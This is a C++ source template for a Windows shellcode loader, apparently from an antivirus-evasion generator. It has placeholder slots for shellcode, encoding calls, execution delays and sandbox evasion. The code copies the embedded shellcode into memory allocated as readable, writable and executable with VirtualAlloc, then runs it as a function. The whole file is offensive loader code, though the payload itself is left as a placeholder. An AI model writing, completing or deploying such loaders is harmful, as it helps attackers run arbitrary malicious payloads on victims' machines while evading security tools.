#include <windows.h>
#include <iostream>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

//####INCLUDE####

//####DEFINE####

//####CODE####

const unsigned char raw[####SHELLCODE_LEN####] = ####SHELLCODE####;
int length = ####SHELLCODE_LEN####;

DWORD WINAPI esc_main(LPVOID lpParameter)
{
    DWORD dwSize;
    bool success = false;
    printf("\n[-] LALALA from inside");

    
    printf("[-] length is %d !\n", length);

    unsigned char* encoded = (unsigned char*)malloc(sizeof(unsigned char)*length*2);
    success = memcpy(encoded, raw, length);
        if (!success){
        printf("[-] Oh gosh, something went wrong!\n");
        return -2;
    }

    //####CALL####

    unsigned char* decoded = encoded;

    //currentProcess = GetCurrentProcess();

    printf("[*] Allocating %d bytes of memory\n", length);
    void *exec = VirtualAlloc(NULL, length, 0x00002000 | 0x00001000, PAGE_EXECUTE_READWRITE);
    if (exec == NULL)
        return -1;

    success = memcpy(exec, decoded, length);
    if (!success){
        printf("[-] Oh gosh, something went wrong!\n");
        return -2;
    }
    
    int ret_val = 0;
    printf("[*] Executing\n");
    ((void (*)())exec)();
    
    printf("[+] The shellcode finished with a return value: %08X\n", ret_val);
    return 0;
}

int main()
{
    printf("\n[-] LALALA");
    //####DELAY####
    //####SANDBOXEVASION####
    //####ARGS####

    esc_main(NULL);
}
